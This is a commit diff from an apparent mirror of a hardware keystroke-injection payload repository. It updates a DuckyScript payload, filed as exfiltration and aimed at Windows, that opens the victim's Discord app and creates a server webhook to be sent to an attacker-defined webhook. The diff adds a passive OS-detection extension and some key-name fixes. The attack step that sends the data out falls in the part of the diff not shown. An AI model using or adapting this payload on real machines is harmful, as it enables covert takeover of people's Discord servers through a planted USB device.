hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #476 from aleff-github/patch-88 

[+] PASSIVE_WINDOWS_DETECT
pull/366/merge
Peaks 2024-09-02 12:22:54 -04:00 committed by GitHub
parent 9f5f323a0d 7749aa95c1
commit 0bebb446fd
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 57 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

70
payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt
View File

@ -1,25 +1,69 @@
REM ############################################################### REM_BLOCK
REM # | ###############################################################
REM # Title : Create And Exfiltrate A Webhook Of Discord | # #
REM # Author : Aleff | # Title : Create And Exfiltrate A Webhook Of Discord #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Exfiltration | # Version : 1.0 #
REM # Target : Windows 10-11 | # Category : Exfiltration #
REM # | # Target : Windows 10-11 #
REM ############################################################### # #
###############################################################
END_REM
REM Requirements: REM Requirements:
REM - Internet connection REM - Internet connection
REM - Discord Installed REM - Discord Installed
REM You must define the Discord server name i.e. Hak5 REM You must define the Discord server name i.e. Hak5
DEFINE #SERVER_NAME example DEFINE #SERVER_NAME example
REM You must define your Discord webhook if you want to use this method for the exfiltration REM You must define your Discord webhook if you want to use this method for the exfiltration
DEFINE #DISCORD_WEBHOOK example DEFINE #DISCORD_WEBHOOK example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Discord app REM Open Discord app
GUI GUI
DELAY 1000 DELAY 1000
@ -74,11 +118,11 @@ TAB
DELAY 500 DELAY 500
TAB TAB
DELAY 500 DELAY 500
DOWN_ARROW DOWNARROW
DELAY 500 DELAY 500
DOWN_ARROW DOWNARROW
DELAY 500 DELAY 500
DOWN_ARROW DOWNARROW
DELAY 500 DELAY 500
ENTER ENTER
DELAY 500 DELAY 500